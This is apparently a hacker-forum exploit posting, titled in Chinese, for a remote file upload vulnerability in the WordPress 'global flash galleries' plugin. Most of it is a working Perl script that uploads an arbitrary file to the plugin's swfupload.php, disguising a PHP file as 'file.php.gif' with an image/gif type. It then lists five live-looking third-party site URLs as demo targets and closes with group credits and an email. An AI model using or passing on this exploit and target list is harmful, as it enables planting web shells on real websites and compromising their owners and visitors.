WordPress global flash galleries插件远程文件上传漏洞

# Exploit :
= = = = = = = = =
[Perl]
#! /usr/bin/perl
use LWP;
use HTTP::Request::Common;

my ($url, $file) = @ARGV;

my $ua = LWP::UserAgent->new();
my $req = POST $url,
Content_Type => ‘form-data’,
Content => [
name => $name,
galleryselect => 1, # Gallery ID (popup.php)
Filedata => [ “$file”, “file.php.gif”, Content_Type =>
‘image/gif’ ]
];
my $res = $ua->request( $req );
if( $res->is_success ) {
print $res->content;
} else {
print $res->status_line, “\n”;
}
[Perl]

# Exploit demo :
= = = = = = = = =
http://radiostXan.fm/wp-content/plugins/global-flash-galleries/swfupload.php
http://izhairstudioX.ca/wp-content/plugins/global-flash-galleries/swfupload.php
http://awb.usahiXdsolo.ac.id/wp-content/plugins/global-flash-galleries/swfupload.php
http://minigolfcXourseulles.fr/wp-content/plugins/global-flash-galleries//swfupload.php
http://madiro-Xhotel.com/wp-content/plugins/global-flash-galleries/swfupload.php

# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# Special Tnx to V1R4N64R ,C4T,HAMIDx9
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #